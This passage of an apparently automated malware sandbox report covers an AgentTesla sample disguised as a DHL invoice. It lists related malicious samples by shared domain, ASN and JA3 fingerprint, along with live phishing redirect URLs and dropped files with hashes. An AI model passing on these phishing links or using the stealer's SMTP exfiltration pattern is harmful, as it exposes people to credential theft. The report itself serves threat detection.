                                                                                                                  datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                    0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                                                                                      BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                                                                                                        REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                          DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            Transferencias6231.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                              Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse

                                                                                                                                Domains

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                smtp.yandex.ruDATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                Transferencias6231.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                api.ipify.orgAID0109FLT24DO53CD-F.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.26.13.205
                                                                                                                                https://u48346967.ct.sendgrid.net/ls/click?upn=u001.A0zc-2BEvyk1Wl-2FMpdhEZeKOri2-2FGgH2RTzsX65VEcnN5SaLyl0UT8OMFIJrPp3PpoUM6xY28FQ2N7ftppG5RudDteJXD3BQZCthiPi2c2ALFGlSPfhe-2FcxhcglgWUQb-2BQESuvSP1z-2Bm6yiScj3t94MRtf0LYKB9CrrSBugAIE2LYG8LmYpSkH60B-2FMZ3-2BrvjbSA4-2FMKq-2BcyWHr8EPqNcLYpXKIa0eXlisYAn-2BUQ7zduW7tl-2BbLdZxK7-2F64kDFJWjAhA5-2BQkfVJJJox5IXYuhbutR70TtJJBVXs1-2BGpCmHbl-2BDNTOjQhDGBdV0GcWgnTqzbjbnvsgf-2Be0TXvdX5Smk9Cf3e70Q9X7CCHEUK7n5Iz83JVMEOM-2Fand-2B23jD1RrWlwwdn356TAiWPO93YBbqf0SO77Y7wdjJ1b9FY9HkvpCMIajIk8oGDIkalcOsvDrkfpAsNhyAACh29yO16Fg-2FM5u3K-2FXbE9Ex7FVSxGjaaC9sm3ZFKCHARATSNuZ5Fje0JCvs-2FuHNf8MhNMkgfl0FBuxcFtouETvn8R0InFl5AtNwGS6Afu60jlKV5PLEF8GeumMl4Zuoh2K-2F2yPQclKc1crfKqXCOnUQUzOQ7UyIpV0r3b47s6ht1AVAEPjV3zoZw9RLpCyXdGkoI8n06eY007Qg9WwLvy7We-2BQcl-2FyYQ4K56RiNFy6ideRccN4rvz5rlbEO4SM2GPwiXl06aWh1Z8A-3D-3DayVm_7jfNTkQybv-2BVetjXJenftZxQwKjBczDJqHH7EaznqVv3v2Dkt-2FIgZwJNXIp-2FyMqSeIPtfO34Zh0BJrBXMe8iDwc4F5cynKVd9U-2BCWNvBhYWndn5YPpcrm9EU-2BINyUV9MYoGCAzxOgZamtaAmmSvzUZGau9tG0E7vfYFw2WK2ssr4DmY5GXF-2BgMFUeEjp9HrYndaGnf0PXO4kOxtTViX7PlJWm1KFcSCvZKxLAfO2BkacR3B5XEdLDYpCUp92-2FH-2FHkhtVIRx1yIxGh6p91O9ZVon-2F9iC9RT46lS0PoWolD8OcxI1a8fShT6Hp4QWQfdHwSEy80yGx3wt6ImkGF4v9TXkQs-2Fsq-2FVFPoSnqaJLrItk8v5xWRdhyDRHKG-2BDTjP6JA9QphZ2npWlpDplGG-2B7VPrWDZBnEu36loOA6wRajUleT-2BwoMeGN4STY52Ur27KRveKCJr82irXKChZwqe-2BaUbmDOUwyLdpuYgAFKsd-2BPzSGCG9KIfFEO3qjrRe-2Ft9WxzxVxFb7rM1MFj1q2QSoqqpSZyyIO6o9dQWLpdkFrZCNwiV9o0NuRkda7B0vqLodHzU4jQ4E2ZVSRC2Gc87k08fCi-2BBF7Dmw-2F3-2FQYcQ-2BUHjUCqjlkaHmxOAI7-2FhdUS1Wb7BgsTAm-2Ft-2BvXBxupXitGd4JcEDUe0WuuxdFLUCWiEzHEB6DI0pZnKp0MjuL6t-2FHdSSyJSuzZQLJWoI1iWOBow7nssQ-2FtT6mq0c4kg9bIepJUAi8J12B9eClWiTZDtbREopSTPA0TrHAq8mBDFqCQ0MfGj13zUsahv2EEEPM5XcF8DfOVu-2BwcjmThtw28U2MS5BiDqE1Pwg-2BCEH40qmpHlF5lcXadw9ehGsQbMKc0VYqPjH2-2BLldks6uo-2Fln-2BeeieWNP8wXJfHHwtYJznNHWBqLw-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 172.67.74.152
                                                                                                                                https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25SERIAL%2525wDnNeW8yycT&sa=t&esrc=nNeW8F%25SERIAL%2525A0xys8Em2FL&source=&cd=tS6T8%25SERIAL%2525Tiw9XH&cad=XpPkDfJX%25SERIAL%2525VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/www.monument-funerar.ro/admin/view/image/payment/#test@example.deGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 104.26.13.205
                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, PureLog Stealer, RedLine, XWormBrowse
                                                                                                                                • 104.26.12.205
                                                                                                                                INVITATION TO BID as on 25 NOV 2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 104.26.13.205
                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                • 104.26.13.205
                                                                                                                                2jbMIxCFsK.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                • 104.26.13.205
                                                                                                                                Packing List - SAPPHIRE X.xlsx.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                • 172.67.74.152
                                                                                                                                WOOYANG VENUS PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                • 172.67.74.152
                                                                                                                                https://app.useblocks.io/getemail/48034?secret_hash=d1541dc5be135b2d0f39c0711cecbe46&raw=trueGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                • 104.26.13.205

                                                                                                                                ASNs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                CLOUDFLARENETUSTNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                • 172.67.162.12
                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                • 172.67.160.80
                                                                                                                                https://michiganchronicle.com/philanthropy-under-siege-how-the-fight-against-the-fearless-fund-threatens-black-womens-progress-in-detroit/Get hashmaliciousUnknownBrowse
                                                                                                                                • 104.26.10.19
                                                                                                                                Siparis po 1198624 _#U0130zmir #U0130stinyepark Projesi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                https://antiphishing.vadesecure.com/v4?f=U3NocHNZUmllMWk0MmdjMYDgQ0wsRYjjfDkZnUsmsqS3bv-gdJZTKaN5KSsipRTf&i=cnNwakphM05sN25WcmhxVcUfrB8NjiRd7gd4RsoOTL4&k=A3pt&r=UUJQWml1Y2NtejlnWDZLZB0Eg6oPQLWHk5a0M-cKRXyoaPvtU4tInW_VqCgS4DhSa_cUZCcNAUmWLKbw9MOxGw&s=bf71d8ade961f6ab439c8235babb7157b334d689888d3083d0cc1744cfe48aaf&u=https%3A%2F%2Fpublic-fra.mkt.dynamics.com%2Fapi%2Forgs%2F85a8c477-bea7-ef11-8a66-0022483994f9%2Fr%2FMKSqoVs73k-RUO5uHPfRswIAAAA%3Ftarget%3D%257B%2522TargetUrl%2522%253A%2522https%25253A%25252F%25252Fassets-fra.mkt.dynamics.com%25252F85a8c477-bea7-ef11-8a66-0022483994f9%25252Fdigitalassets%25252Fstandaloneforms%25252F46042089-b8ac-ef11-a72d-6045bd6e29e8%2522%252C%2522RedirectOptions%2522%253A%257B%25226%2522%253A%2522mktprf9fb729cc84d74db3bce9a30da7409e87eoprf%2522%252C%25221%2522%253Anull%257D%257D%26digest%3Djuexwq7Jl6DCR7CneIIynCjAtNPRJ1FxLmm99rnbDLA%253D%26secretVersion%3D02e7c83d621d4269af2f08a8e4e233cfGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.215.61
                                                                                                                                https://clickme.thryv.com/ls/click?upn=u001.5-2B1Zlj-2BwCegXqgd6Um7kY0JRT8UgUE3u1rWR4YFASxlUU28BkvglW4Sw74FAirirfRSk_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQjRRfcuGnHeO06MZmpQ9Md6EqF3tHpTnJtwnRl07eBC-2BbeqGDZkqEsFQ9fh8CwKb92GLRs9xjA4K3L0qiP8u-2BrdM8wHoplpWV7e4Ic88yYySdEC6BFxZgKH7uN8ysaI5ELMcoW165-2BlUHwvAK7b88Y-2FPYUokK9PeBa-2FcZkvlS9nh3pVTeDrVNhWWvISMX1rFpeltySyG2xWyMwf0YLv9gS0X1AE0s7oDERqOcaTwfLsXQxoV99DX1bVNLU7d5FQCgc-3D#C?email=heath.teresa@aidb.orgGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.191.170
                                                                                                                                file.exeGet hashmaliciousPureCrypter, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                • 104.21.82.174
                                                                                                                                https://98dm.oyvysi.com/pNP5FoexU0Zwq_iRmrJnKFv/Get hashmaliciousUnknownBrowse
                                                                                                                                • 104.21.67.123
                                                                                                                                QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                REMITTANCE_PAYMENT54342Saic.htmlGet hashmaliciousPhisherBrowse
                                                                                                                                • 104.21.20.53
                                                                                                                                YANDEXRUla.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 100.43.91.146
                                                                                                                                AccountDocuments - christinal.docxGet hashmaliciousUnknownBrowse
                                                                                                                                • 77.88.21.119
                                                                                                                                loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                • 5.45.222.189
                                                                                                                                DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                http://www.tqltrax.comGet hashmaliciousUnknownBrowse
                                                                                                                                • 87.250.251.119
                                                                                                                                DATASHEET.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                                                                                                • 77.88.21.158
                                                                                                                                BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 77.88.21.158

                                                                                                                                JA3 Fingerprints

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0efaktura461250706050720242711#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                • 104.26.12.205
                                                                                                                                document.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.26.12.205
                                                                                                                                Siparis po 1198624 _#U0130zmir #U0130stinyepark Projesi.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 104.26.12.205
                                                                                                                                https://antiphishing.vadesecure.com/v4?f=U3NocHNZUmllMWk0MmdjMYDgQ0wsRYjjfDkZnUsmsqS3bv-gdJZTKaN5KSsipRTf&i=cnNwakphM05sN25WcmhxVcUfrB8NjiRd7gd4RsoOTL4&k=A3pt&r=UUJQWml1Y2NtejlnWDZLZB0Eg6oPQLWHk5a0M-cKRXyoaPvtU4tInW_VqCgS4DhSa_cUZCcNAUmWLKbw9MOxGw&s=bf71d8ade961f6ab439c8235babb7157b334d689888d3083d0cc1744cfe48aaf&u=https%3A%2F%2Fpublic-fra.mkt.dynamics.com%2Fapi%2Forgs%2F85a8c477-bea7-ef11-8a66-0022483994f9%2Fr%2FMKSqoVs73k-RUO5uHPfRswIAAAA%3Ftarget%3D%257B%2522TargetUrl%2522%253A%2522https%25253A%25252F%25252Fassets-fra.mkt.dynamics.com%25252F85a8c477-bea7-ef11-8a66-0022483994f9%25252Fdigitalassets%25252Fstandaloneforms%25252F46042089-b8ac-ef11-a72d-6045bd6e29e8%2522%252C%2522RedirectOptions%2522%253A%257B%25226%2522%253A%2522mktprf9fb729cc84d74db3bce9a30da7409e87eoprf%2522%252C%25221%2522%253Anull%257D%257D%26digest%3Djuexwq7Jl6DCR7CneIIynCjAtNPRJ1FxLmm99rnbDLA%253D%26secretVersion%3D02e7c83d621d4269af2f08a8e4e233cfGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.26.12.205
                                                                                                                                https://clickme.thryv.com/ls/click?upn=u001.5-2B1Zlj-2BwCegXqgd6Um7kY0JRT8UgUE3u1rWR4YFASxlUU28BkvglW4Sw74FAirirfRSk_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQjRRfcuGnHeO06MZmpQ9Md6EqF3tHpTnJtwnRl07eBC-2BbeqGDZkqEsFQ9fh8CwKb92GLRs9xjA4K3L0qiP8u-2BrdM8wHoplpWV7e4Ic88yYySdEC6BFxZgKH7uN8ysaI5ELMcoW165-2BlUHwvAK7b88Y-2FPYUokK9PeBa-2FcZkvlS9nh3pVTeDrVNhWWvISMX1rFpeltySyG2xWyMwf0YLv9gS0X1AE0s7oDERqOcaTwfLsXQxoV99DX1bVNLU7d5FQCgc-3D#C?email=heath.teresa@aidb.orgGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.26.12.205
                                                                                                                                Payment_Slip.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.26.12.205
                                                                                                                                Banorte_Aviso_de_Pago_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.26.12.205
                                                                                                                                New_June_Inquiry_List_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.26.12.205
                                                                                                                                Jordan Kuwait Bank _ Payment Advice MT103.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.26.12.205
                                                                                                                                Payment_Slip.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.26.12.205

                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Delivery Invoice.exe.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1730
                                                                                                                                Entropy (8bit):5.35299682261553
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMR5vzHKnHKU57Uy:Pq5qHwCYqh3oPtI6eqzxqqMR5rqnqU5t
                                                                                                                                MD5:4D047149BCD6E4625565C631F1F723B2
                                                                                                                                SHA1:33909516B8ACB42E0B7E5E7D48F8B2D917094BCB
                                                                                                                                SHA-256:E84139F7D948F47ADF2E6346641261ADED096D1DB640EFF9B9B7D122121685DC
                                                                                                                                SHA-512:AE0D2AC2C282AEBA1B63851529892240C3BE5D56F3996F1BEE3263FBB13A7A044348D63F04B0705836C5847994BD553F342511F6BB4DD075E4E8A3E9CB12D54F
                                                                                                                                Malicious:true
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LIWBHGsz.exe.log

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1730
                                                                                                                                Entropy (8bit):5.35299682261553
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMR5vzHKnHKU57Uy:Pq5qHwCYqh3oPtI6eqzxqqMR5rqnqU5t
                                                                                                                                MD5:4D047149BCD6E4625565C631F1F723B2
                                                                                                                                SHA1:33909516B8ACB42E0B7E5E7D48F8B2D917094BCB
                                                                                                                                SHA-256:E84139F7D948F47ADF2E6346641261ADED096D1DB640EFF9B9B7D122121685DC
                                                                                                                                SHA-512:AE0D2AC2C282AEBA1B63851529892240C3BE5D56F3996F1BEE3263FBB13A7A044348D63F04B0705836C5847994BD553F342511F6BB4DD075E4E8A3E9CB12D54F
                                                                                                                                Malicious:false
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2232
                                                                                                                                Entropy (8bit):5.379401388151058
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:fLHxvIIwLgZ2KRHWLOuggs
                                                                                                                                MD5:1F07DBFC960DDEA7295F1A6FD48057B1
                                                                                                                                SHA1:05F3052BCC168B834CEA8EA48E050020C5CAD8F5
                                                                                                                                SHA-256:72F8629C56744FE3E1E3C1B705EF6355E59E5C96B4924427EE430C9F9EF46809
                                                                                                                                SHA-512:D94DF9A81FAF494891837FA73FECEF1D8226E18978A2EEA534409724409E13C6DACAB32E00C494FB2A140573E1C152EE407A0E070515B3802A06649690B1C491
                                                                                                                                Malicious:false
                                                                                                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22cz4tvm.3ai.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fgyrvunt.s1o.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocqnukxp.kmd.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oga4e2tx.x1a.psm1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pa00wwmt.5p0.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qik2rph4.ezo.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qim5ulos.tk0.ps1

                                                                                                                                Download File
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
